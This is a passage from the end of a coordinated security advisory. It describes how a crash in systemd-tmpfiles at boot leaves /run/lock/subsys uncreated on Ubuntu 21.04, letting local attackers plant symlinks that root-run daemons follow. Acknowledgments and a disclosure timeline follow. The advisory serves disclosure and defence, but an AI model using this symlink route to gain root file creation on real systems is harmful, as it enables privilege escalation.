> however, we noticed that:
>
> - at boot time, systemd executes "systemd-tmpfiles --create --remove
>  --boot --exclude-prefix=/dev";
>
> - systemd-tmpfiles first enters the "remove" phase, and subsequently
>  enters the "create" phase;
>
> - but if systemd-tmpfiles crashes during the "remove" phase, then it
>  never enters the "create" phase;
>
> - and it fails to create the files and directories (specified in
>  /usr/lib/tmpfiles.d/*.conf) that it should create at boot time;
>
> - for example, on Ubuntu 21.04, systemd-tmpfiles fails to create the
>  directory /run/lock/subsys; but because /run/lock is world-writable,
>  attackers can create their own /run/lock/subsys; and because various
>  legacy packages and daemons write into /run/lock/subsys as root, the
>  attackers may create arbitrary files via symlinks in /run/lock/subsys.
>
> Last-minute note: it seems impossible to trigger this vulnerability in
> systemd-tmpfiles versions before commit e535840 ("tmpfiles: let's bump
> RLIMIT_NOFILE for tmpfiles") from February 2019.
>
>
>
> ========================================================================
> Acknowledgments
> ========================================================================
>
> We thank the Ubuntu Security Team (Alex Murray and Seth Arnold in
> particular) for their hard work on the snap-confine vulnerabilities. We
> also thank Red Hat Product Security, Zbigniew Jedrzejewski-Szmek, Karel
> Zak, Siddhesh Poyarekar, and the members of linux-distros@...nwall for
> their work on the systemd, util-linux, and glibc vulnerabilities.
>
> This advisory is dedicated to 8lgm -- followers of symbolic links,
> overflowers of stack buffers, and dereferencers of NULL pointers:
>
> https://attrition.org/security/advisory/8lgm/
> https://web.archive.org/web/20081203221844/packetstorm.linuxsecurity.com/poisonpen/8lgm/ptchown.c
>
>
>
> ========================================================================
> Timeline
> ========================================================================
>
> 2021-10-27: We sent our advisory and proofs of concept to
> security@...ntu.
>
> 2021-11-10: We sent our advisory and proofs of concept (without the
> snap-confine vulnerabilities) to secalert@...hat.
>
> 2021-12-29: We sent a write-up and the patch for the systemd
> vulnerability to linux-distros@...nwall.
>
> 2022-01-10: We published our write-up on the systemd vulnerability
> (https://www.openwall.com/lists/oss-security/2022/01/10/2).
>
> 2022-01-12: Red Hat filed the glibc vulnerabilities upstream
> (https://sourceware.org/bugzilla/show_bug.cgi?id=28769 and
> https://sourceware.org/bugzilla/show_bug.cgi?id=28770).
>
> 2022-01-20: We sent a write-up and the patches for the util-linux
> vulnerabilities to linux-distros@...nwall.
>
> 2022-01-24: We published our write-up on the util-linux vulnerabilities
> (https://www.openwall.com/lists/oss-security/2022/01/24/2).
>
> 2022-01-24: We published our write-up on the glibc vulnerabilities
> (https://www.openwall.com/lists/oss-security/2022/01/24/4).
>
> 2022-02-03: We sent our advisory and Ubuntu sent their patches for the
> snap-confine vulnerabilities to linux-distros@...nwall.
>
> 2022-02-17: Coordinated Release Date (5:00 PM UTC) for the snap-confine
> vulnerabilities.
>